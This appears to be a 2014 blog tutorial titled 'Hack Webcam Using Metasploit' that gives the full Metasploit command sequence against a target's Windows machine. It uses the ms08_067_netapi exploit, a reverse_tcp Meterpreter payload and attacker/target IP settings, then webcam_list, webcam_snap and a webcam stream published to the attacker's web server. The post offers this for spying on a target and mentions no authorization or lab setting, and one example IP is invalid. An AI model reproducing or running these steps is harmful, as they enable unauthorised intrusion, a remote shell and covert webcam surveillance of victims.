Saturday 6 September 2014

Hack Webcam Using Metasploit ( Backtrack / Kali ) Linux



REQUIREMENTS

1) Backtrack 5r3 or Kali Linux  :

http://www.kali.org/downloads/
  
2) Metasploit, you will need this which is important actually it's pre-installed in backtrack but some of you         don't have it in your backtrack so you can download them from here

http://www.metasploit.com/

Ok so now let's begin,

Open terminal and type:
msfconsole

Next set our exploit:
use exploit/windows/smb/ms08_067_netapi
screenyny.jpg


Set payload and use meterpreter
set PAYLOAD windows/meterpreter/reverse_tcp
screenlgl.jpg


Set RHOST (target ip)
set RHOST (your target adress)
e.g set RHOST 192.258.24.1
screenmhm.jpg

Set LHOST (us)
set LHOST 192.155.0.150
screenvrv.jpg



Now type:
exploit
screenhth.jpg



now show what webcam use:
webcam_list
e.g he use Logitech webcam C160
webcam_snap
screenrir.jpg





Show time
run webcam -p /var/www
starting webcam...

mnici.png


Open Your Browser and Go To : 
zzlhl.png















Got from other forum + little edit from me